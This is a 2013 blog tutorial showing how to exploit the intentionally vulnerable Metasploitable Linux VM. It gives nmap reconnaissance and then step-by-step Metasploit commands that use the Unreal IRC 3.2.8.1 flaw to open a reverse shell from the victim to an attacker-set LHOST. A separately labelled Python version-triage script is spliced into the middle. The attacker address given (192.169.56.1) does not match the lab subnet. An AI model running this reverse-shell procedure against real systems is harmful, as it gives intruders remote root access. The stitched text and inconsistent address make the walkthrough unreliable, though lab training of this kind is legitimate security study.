
Monday, 04 February 2013

Exploit: Metasploitable Linux

This time we will try to exploit Metasploitable Linux.
What is Metasploitable Linux?

Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques.

OK, as a first step, let's gather information about Metasploitable Linux using nmap.
Type the command #nmap -T4 -v -A 192.168.56.102


For each port, we see the port number, service type and even an attempt at the service software version.

From here, we can grab the software version, in this case “Unreal IRC 3.2.8.1”, and do a search for vulnerabilities for that software release. Just searching “unreal3.2.8.1 exploits” in Google should do the trick. With a little searching, you can find an Unreal exploit usable through Backtrack 5's Metasploit program that will give you a root shell. See if you can find it and give it a shot. If you strike out, no worries, we will take a closer look at this in a later tutorial.

If nothing comes up, you may not have the exact software version. Nmap tries its best, but it is not always correct. Backtrack 5's Metasploit console has several service scanners that we can use to get exact version levels. We will take a closer look at these in the next tutorial. Then we will dive into exploiting the open services.
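The same version information can drive an inventory check on your own lab network. The following is an added example, not part of the original post: it parses nmap grepable output (assumed to come from `nmap -sV -oG -`, which the post does not use) and flags the Unreal IRC release named above, treating a banner without a version number as "unknown" rather than "safe". The sample scan lines, the second host and the product-name pattern are constructed for illustration.

```python
import re

# Release named in the post; the product pattern is an assumption about
# how the scanner spells the product name in its banner.
PRODUCT = re.compile(r"unreal\s*irc", re.I)
FLAGGED_VERSION = "3.2.8.1"

# Constructed sample of grepable output (not captured from a real scan).
SAMPLE = (
    "Host: 192.168.56.102 ()\tPorts: 22/open/tcp//ssh//OpenSSH 4.7p1/, "
    "6667/open/tcp//irc//Unreal ircd/\n"
    "Host: 192.168.56.103 ()\tPorts: 6667/open/tcp//irc//UnrealIRCd 3.2.8.1/, "
    "80/closed/tcp//http///\n"
)

def parse_grepable(text):
    """Yield (host, port, service, banner) for every open port."""
    for line in text.splitlines():
        m = re.match(r"Host: (\S+) .*?Ports: (.*)", line)
        if not m:
            continue  # e.g. "Status: Up" lines carry no port list
        host, ports = m.groups()
        ports = ports.split("\t")[0]  # drop trailing tab-separated fields
        for entry in ports.split(", "):
            # Field order: port/state/proto/owner/service/rpcinfo/version/
            f = entry.strip().split("/")
            if len(f) >= 7 and f[1] == "open":
                yield host, int(f[0]), f[4], f[6]

def triage(text):
    """Return (host, port, status) for every open port matching PRODUCT."""
    findings = []
    for host, port, _service, banner in parse_grepable(text):
        if not PRODUCT.search(banner):
            continue
        ver = re.search(r"\d+(?:\.\d+)+", banner)
        if ver is None:
            status = "VERSION_UNKNOWN"  # banner lacks a version: verify by hand
        elif ver.group(0) == FLAGGED_VERSION:
            status = "VULNERABLE_VERSION"
        else:
            status = "OTHER_VERSION"
        findings.append((host, port, status))
    return findings

if __name__ == "__main__":
    for host, port, status in triage(SAMPLE):
        print(f"{host}:{port} {status}")
```
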

Next, in the Metasploit console, type the command #search Unreal ircd

To see which payloads are available, type #show payloads
We are using the cmd/unix/reverse payload.
Type the command #set payload cmd/unix/reverse

Then type the command #show options to display the variables of the cmd/unix/reverse payload

From the information above, we have to fill in RHOST (the victim's IP), LHOST (the attacker's IP) and TARGET.

#set RHOST 192.168.56.102

#set LHOST 192.169.56.1

#set TARGET 0

Now, let's type the command
#exploit

Success.
Good luck, and try harder!
